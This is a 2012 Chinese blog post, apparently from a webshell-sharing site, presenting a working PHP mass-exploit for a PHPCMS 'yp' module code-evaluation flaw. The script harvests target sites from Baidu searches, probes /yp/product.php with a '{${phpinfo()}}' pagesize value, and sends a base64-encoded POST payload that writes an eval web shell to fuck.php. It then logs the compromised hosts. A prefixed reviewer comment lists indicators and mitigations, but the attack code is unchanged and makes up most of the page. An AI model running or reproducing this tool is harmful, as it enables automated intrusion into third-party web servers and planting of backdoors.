phpcms-exp 0day

分类:安全 | 2012-03-9 | 撸过 158 次
<?php
/*
 * Reviewer documentation: a defensive reading of the listing below. The code itself is unchanged.
 *
 * Behaviour visible in the code:
 *   1. ReadBaiduList() requests Baidu result pages for $keyword and keeps only
 *      the host part of every result link it matches.
 *   2. The main loop appends each host that is not already in url.txt and
 *      passes it to okbug().
 *   3. okbug() sends GET /yp/product.php with a PHP complex-variable expression
 *      in the "pagesize" query parameter and treats a response containing
 *      "php.ini" as proof that the server evaluated that expression.
 *   4. exploit() sends a POST to the same path; "pagesize" evaluates a POST
 *      field, and the base64 value in field z0 decodes to PHP that appends a
 *      one-line eval-style web shell to a file named fuck.php.
 *   5. okor() requests /yp/fuck.php and returns true when the substring "200"
 *      appears anywhere in the response; such hosts are logged to shell.txt.
 *
 * NOTE(review): the vulnerable server-side code is not on this page. The probe
 * implies that the value of "pagesize" reaches a context where PHP evaluates
 * it as code (for example a double-quoted string that is evaluated). Confirm
 * against the PHPCMS yp module source.
 *
 * Indicators a defender can search for (all taken from the requests below):
 *   - requests to /yp/product.php whose pagesize value contains "${" or "{${"
 *   - POST bodies to that path with fields "a" and "z0" (base64, URL-encoded)
 *   - the fixed header "X-Forwarded-For: 199.1.88.29" together with the
 *     User-Agent "Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0"
 *   - "Host:" headers written without a space after the colon on the GET probes
 *   - a file fuck.php under the site's /yp/ directory, or any unexpected PHP
 *     file there that passes a request field to eval()
 *
 * Mitigation: update PHPCMS to a release that fixes the yp module (the fixed
 * version is not stated on this page), validate "pagesize" as an integer before
 * use, and alert on or block query strings containing "${". A host where the
 * dropped file exists should be handled as compromised: remove the file,
 * review access logs for POSTs to it, and rotate credentials stored on the host.
 */
error_reporting(E_ERROR);
set_time_limit(0);

$keyword=’inurl:about/joinus’ ; // batch search keyword
// Socket timeout passed through to fsockopen() in ReadBaiduList().
$timeout = 1;
// First and last search-result page to walk; each page index is turned into the pn offset.
$stratpage = 1;
$lastpage = 10000000;
for ($i=$stratpage ; $i<=$lastpage ; $i++ ){
$array=ReadBaiduList($keyword,$timeout,$i);
foreach ($array as $url ){
// url.txt is re-read for every host and acts as the list of hosts already seen.
$url_list=file(‘url.txt’);
if (in_array(“$url\r\n”,$url_list)){
echo “[-] Links repeat\n”;
}else{
$fp = @fopen(‘url.txt’, ‘a’);
@fwrite($fp, $url.”\r\n”);
@fclose($fp);
print_r(”
[-] Get …… $url\r\n”);
// Probe first: only hosts for which okbug() returns true reach exploit() and okor().
if(okbug($url)){
$exploit=exploit($url);

$ors=okor($url);
if ($ors){
echo “
  • Shell:-> “.$url.”/yp/fuck.php\n”; $fp = @fopen(‘shell.txt’, ‘a’); @fwrite($fp, $url.”/yp/fuck.php\r\n”); @fclose($fp); } }else{ print “[-] No Bug!\n”; } } } } function exploit($url){ $host=$url; $port=”80″; $content =’a=@eval(base64_decode($_POST[z0]));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0%2BfCIpOzskZnAgPSBAZm9wZW4oJ2Z1Y2sucGhwJywgJ2EnKTsgDQoNQGZ3cml0ZSgkZnAsJzw%2FcGhwIEBldmFsKCRfUE9TVFtjZmtpbmddKTs%2FPicpOw0KDUBmY2xvc2UoJGZwKTs7ZWNobygifDwtIik7ZGllKCk7′; $data = ‘POST /yp/product.php?pagesize=${${@eval%28$_POST[a]%29}} HTTP/1.1′.”\r\n”; $data .= “X-Forwarded-For: 199.1.88.29\r\n”; $data .= “Referer: http://$host\r\n”; $data .= “Content-Type: application/x-www-form-urlencoded\r\n”; $data .= “User-Agent: Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0\r\n”; $data .= “Host: $host\r\n”; $data .= “Content-Length: “.strlen($content).”\r\n”; $data .= “Cache-Control: no-cache\r\n\r\n”; $data .= $content.”\r\n”; $ock=fsockopen($host,$port); if (!$ock) { echo “
  • No response from $host\n”; } fwrite($ock,$data); while (!feof($ock)) { $exp=fgets($ock, 1024); return $exp; } } function okor($host){ $tmp = array(); $data = ”; $fp = @fsockopen($host,80,$errno,$errstr,60); @fputs($fp,”GET /yp/fuck.php HTTP/1.1\r\nHost:$host\r\nConnection: Close\r\n\r\n”); while ($fp && !feof($fp)) $data .= fread($fp, 102400); @fclose($fp); if (strpos($data, ’200′) !== false) { return true; }else{ return false; } } function okbug($host){ $tmp = array(); $data = ”; $fp = @fsockopen($host,80,$errno,$errstr,60); @fputs($fp,’GET /yp/product.php?view_type=1&catid=&pagesize={${phpinfo()}}&areaname=&order= HTTP/1.1′.”\r\nHost:$host\r\nConnection: Close\r\n\r\n”); while ($fp && !feof($fp)) $data .= fread($fp, 102400); @fclose($fp); if(preg_match(‘/(php.ini)/i’,$data)) { return true; }else{ return false; } } function ReadBaiduList($keyword,$timeout,$nowpage) { $tmp = array(); //$data = ”; $nowpage = ($nowpage-1)*10; $fp = @fsockopen(‘www.baidu.com’,80,$errno,$errstr,$timeout); @fputs($fp,”GET /s?wd=”.urlencode($keyword).”&pn=”.$nowpage.” HTTP/1.1\r\nHost:www.baidu.com\r\nConnection: Close\r\n\r\n”); while ($fp && !feof($fp)) $data .= fread($fp, 1024); @fclose($fp); preg_match_all(“/\}\)\” href\=\”http\:\/\/([^~]*?)\” target\=\”\_blank\”/i”,$data,$tmp); $num = count($tmp[1]); $array = array(); for($i = 0;$i < $num;$i++) { $row = explode(‘/’,$tmp[1][$i]); $array[] = str_replace(‘http://’,”,$row[0]); } return $array; } ?>
本站内容均为原创,转载请务必保留署名与链接!
phpcms-exp 0day:https://www.webshell.cc/3333.html